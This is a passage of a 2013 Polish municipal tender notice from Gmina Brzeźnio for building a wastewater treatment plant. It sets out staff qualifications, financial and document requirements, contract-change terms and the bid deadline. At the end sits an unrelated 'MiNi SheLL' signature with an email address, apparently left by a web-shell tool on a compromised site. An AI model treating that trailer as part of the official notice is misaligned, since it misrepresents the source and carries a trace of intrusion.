- doświadczenie w nadzorowaniu lub kierowaniu robotami polegającymi na budowie, modernizacji lub rozbudowie oczyszczalni ścieków o przepustowości co najmniej 275 m3/d i RLM = 2 400 i wartości min. 3,5 mln zł,
- uprawnienia budowlane w specjalności instalacyjno - inżynieryjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych, lub odpowiadające im ważne uprawnienia budowlane, w zakresie sieci sanitarnych, adekwatne do pełnionej samodzielnej funkcji technicznej w budownictwie, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- przynależność do właściwej Izby Inżynierów Budownictwa
2) kierownik robót konstrukcyjno - budowlanych - niniejsza osoba ma posiadać następujące kwalifikacje:
- co najmniej 5-letnie doświadczenie zawodowe na stanowisku kierownika robót konstrukcyjno - budowlanych,
- doświadczenie w nadzorowaniu lub kierowaniu robotami polegającymi na budowie, modernizacji lub rozbudowie budynków
- uprawnienia budowlane do kierowania robotami w branży konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane w branży konstrukcyjno - budowlanej, które zostały wydane na podstawie wcześniej obowiązujących przepisów
- przynależność do właściwej Izby Inżynierów Budownictwa 

3) kierownik robót elektrycznych  - niniejsza osoba ma posiadać następujące kwalifikacje:
- co najmniej 5-letnie doświadczenie zawodowe na stanowisku kierownika robót elektrycznych
- doświadczenie w nadzorowaniu lub kierowaniu min. jedną robotą polegającą na budowie, modernizacji lub rozbudowie oczyszczalni ścieków,
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- przynależność do właściwej Izby Inżynierów Budownictwa 

4) specjalista ds. AKPiA - niniejsza osoba ma posiadać następujące kwalifikacje:
- wykształcenie wyższe techniczne - elektroenergetyka, automatyka itp.
- posiadać co najmniej 5-letnie doświadczenie zawodowe w zakresie AKPiA

5) specjalista d.s. technologii oczyszczania ścieków/specjalista ds. rozruchów - niniejsza osoba ma posiadać następujące kwalifikacje:
- wykształcenie wyższe techniczne w zakresie branży sanitarnej,
- posiadać co najmniej 5-letnie doświadczenie zawodowe w branży technologii oczyszczania ścieków i/lub rozruchów oczyszczalni ścieków, 
- wykazać się doświadczeniem w prowadzeniu i/lub nadzorze i/lub rozruchu co najmniej jednej inwestycji w zakresie budowy lub modernizacji lub rozbudowy oczyszczalni ścieków o przepustowości co najmniej 275 m3/d
 
Uwaga:
Posiadane przez w/w osoby uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz aktualnym obowiązującym rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. Nr 83 z 2006 r., poz. 578;).
Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994 r. Prawo Budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie wykazują te dokumenty jako obowiązujące.

Zamawiający określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza, odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (tekst jedn. Dz. U. z 2010 r., Nr 243, poz. 1623 ze zm.) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008 r., Nr 63, poz. 394).
Wskazane w niniejszym punkcie osoby powinny biegle posługiwać się językiem polskim.
W przypadku, gdy wskazane osoby nie wykazują się biegłą znajomością języka polskiego Wykonawca jest zobowiązany zapewnić co najmniej jednego tłumacza na okres realizacji umowy w celu realizacji potrzeb wynikających z wykonywanego zamówienia.
Zamawiający nie dopuszcza łączenia funkcji przez w/w osoby.
Wyżej wymieniony skład zespołu osobowego jest zespołem podstawowym (kluczowym). Wykonawca powinien przeanalizować jeżeli jest to konieczne możliwość zatrudnienia dodatkowego personelu w celu zapewnienia należytego wykonania zamówienia.

Zamawiający co do zasady zakazuje zmian przedstawionego w ofercie personelu. Zmiany takie będą możliwe jedynie po zaistnieniu okoliczności niezależnych od Wykonawcy (np. zdarzeń losowych). W takim przypadku wszelkie zmiany personelu muszą uzyskać zgodę Zamawiającego i być zgodne z wymaganiem SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi posiadać na rachunku bankowym środki finansowe lub mieć zdolność kredytową  w wysokości nie mniejszej niż 1,2 mln zł.
W przypadku, gdy Wykonawca wykazuje środki w innej walucie niż w złotych polskich, Zamawiający dokona przeliczenia wartości w innej walucie na złote polskie na podstawie średniego kursu złotego w stosunku do walut obcych określonego w Tabeli Kursów Narodowego Banku Polskiego na przeddzień publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
- Wykonawca musi posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 3,5 mln zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- instrukcji obsługi, kart katalogowych, certyfikatów, atestów, aprobat technicznych lub innych dokumentów potwierdzających, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego w SIWZ. Zamawiający uzna za wystarczające załączenie jednego z w/w dokumentów potwierdzającego, że oferowane rozwiązania odpowiadają wymaganiom określonym przez Zamawiającego. Załączenie w/w dokumentów wymagane jest jedynie przy zastosowaniu materiałów i urządzeń równoważnych wymienionych w załączniku nr 10  do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz ofertowy,
- oświadczenie z art. 22 ustawy pzp
- oryginał pełnomocnictwa udzielanego osobom podpisującym ofertę lub kserokopii poświadczonej notarialnie za zgodność z oryginałem, o ile prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego;
- w przypadku wspólnego ubiegania się o udzielenie zamówienia - pełnomocnictwo do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
- wykazu części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom lub oświadczenie, że Wykonawca wykona zamówienie własnymi siłami 
- dokument wniesienia wadium,
- dokument o przynależności do grupy kapitałowej</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, pod rygorem nieważności.
2. Zgodnie z art. 144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, gdy nastąpi:
1) zmiana terminu przekazania terenu budowy oraz zmiana terminu przewidzianego na rozpoczęcie robót:
a) zmiany spowodowane warunkami atmosferycznymi w szczególności:
- klęski żywiołowe;
- warunki atmosferyczne odbiegające od typowych, uniemożliwiające rozpoczęcie 
i prowadzenie robót budowlanych;
b) niemożliwość niezwłocznego zawarcia umowy po dokonaniu wyboru oferty najkorzystniejszej w związku z wniesionym odwołaniem;
c) zmiany warunków dofinansowania zmieniającego terminy i zasady realizacji inwestycji;

2) zmiana terminu przewidzianego na zakończenie robót:
a) zmiany spowodowane warunkami atmosferycznymi w szczególności:
- klęski żywiołowe;
- warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów;
b) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, archeologicznymi lub terenowymi, 
c) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne;
d) odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie nie zinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych;
e) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego 
w szczególności:
- wstrzymanie robót przez Zamawiającego;
- konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej lub specyfikacji technicznej wykonana i odbioru robót;
- odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, zezwoleń, uzgodnień z przyczyn niezawinionych przez Wykonawcę, 
w tym odmowa udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji;
f) zmiany będące następstwem powierzenia przez Zamawiającego wykonania zamówień dodatkowych lub robót zamiennych, jeżeli terminy ich powierzenia, rodzaj oraz zakres uniemożliwiają dotrzymanie pierwotnego terminu zakończenia realizacji umowy;
g) konieczność uzyskania niemożliwych do przewidzenia na etapie planowania inwestycji: danych, zgód lub pozwoleń osób trzecich lub właściwych organów;
h) wstrzymanie realizacji prac objętych umową, co uniemożliwia terminowe zakończenie realizacji przedmiotu umowy;
i) niemożliwość niezwłocznego zawarcia umowy po dokonaniu wyboru oferty najkorzystniejszej w związku z wniesionym odwołaniem;
j) zmiany warunków dofinansowania zmieniającego terminy i zasady realizacji inwestycji
k) wystąpienie przedłużenia się okresu osiągania parametrów technologicznych nie zawinionego przez Wykonawcę,
l) opóźnienie w przeprowadzeniu prób z powodu wykonania polecenia inżyniera lub opóźnienia, za które Zamawiający jest odpowiedzialny,
m) opóźnienie w dokonaniu prób końcowych tak, że opóźniają się one o więcej niż 14 dniu z przyczyn za które odpowiada Zamawiający,

3) zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych 
w szczególności następującymi okolicznościami:
a) niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót  spowodowanych zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń;
b) pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy;
c) pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy;
d) konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy;
Zmiany te mogą nastąpić jedynie po uzyskaniu pozytywnej opinii Inspektora Nadzoru i zgody Zamawiającego.

4) pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
a) zmiana powszechnie obowiązujących przepisów prawa w zakresie mającymi wpływ na realizację zamówienia;
b) konieczność wprowadzenia zmian będzie następstwem zmian stawki VAT, przy czym zmianie ulega kwota podatku VAT i kwota brutto;
c) siła wyższa  uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
d) zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu;

5) Zamawiający przewiduje rozwiązania zamienne, które nie wykraczają poza zdefiniowany przedmiot zamówienia;

Uwzględnienie robót zamiennych w trakcie realizowanej inwestycji może nastąpić przez zmianę umowy o zamówienie publiczne (aneks do umowy). Przykładem zmiany nie powodującej wykroczenia poza przedmiot zamówienia będzie decyzja o zmianie sposobu wykonania jakiegoś elementu robót, zmiany materiałów itp.
Wprowadzenie robót zamiennych nie może spowodować zwiększenia wysokości wynagrodzenia określonego w umowie.
Roboty zamienne mogą zostać wykonane wyłącznie na podstawie uprzednio sporządzonego protokołu konieczności, podpisanego przez kierownika budowy i inspektora nadzoru oraz zatwierdzonego przez Kierownika Zamawiającego.

6) Zamawiający przewiduje wydłużenie terminu związania ofertą na okres nie dłuższy niż 60 dni.
7) Zamawiający przewiduje zmiany nazw, siedziby stron umowy, numerów kont bankowych i innych danych identyfikacyjnych.
8) Zamawiający przewiduje zmiany form zabezpieczenia należytego wykonania umowy.
9) Zamawiający przewiduje zmiany osób odpowiedzialnych za kontakty, nadzór nad przedmiotem umowy, kierowników budowy, robót. Z zastrzeżeniem, że zmiana może być dokonana pod warunkiem, ze w wykonaniu zamówienia będą uczestniczyć osoby, które spełniają wymagania określone w SIWZ.
10) Zamawiający przewiduje zmniejszenie zakresu wynagrodzenia z przyczyn o obiektywnym charakterze, istotnej zmiany okoliczności powodującej, że wykonanie części zakresu realizacji umowy nie leży w interesie publicznym, czego nie można było przewidzieć. 
11) Zamawiający przewiduje zmianę umowy w zakresie podwykonawców, jeśli Zamawiający będzie miał zastrzeżenia co do podwykonawców lub zmiany podwykonawców.

Dokonanie zmian, o których mowa powyżej wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.brzeznio.finn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Brzeźnio, ul. Wspólna 44, 98-275 Brzeźnio,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 10:00, miejsce: Urząd Gminy Brzeźnio, ul. Wspólna 44, 98-275 Brzeźnio, sekretariat pokój nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach działania 
Podstawowe usługi dla gospodarki i ludności wiejskiej 
objętego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com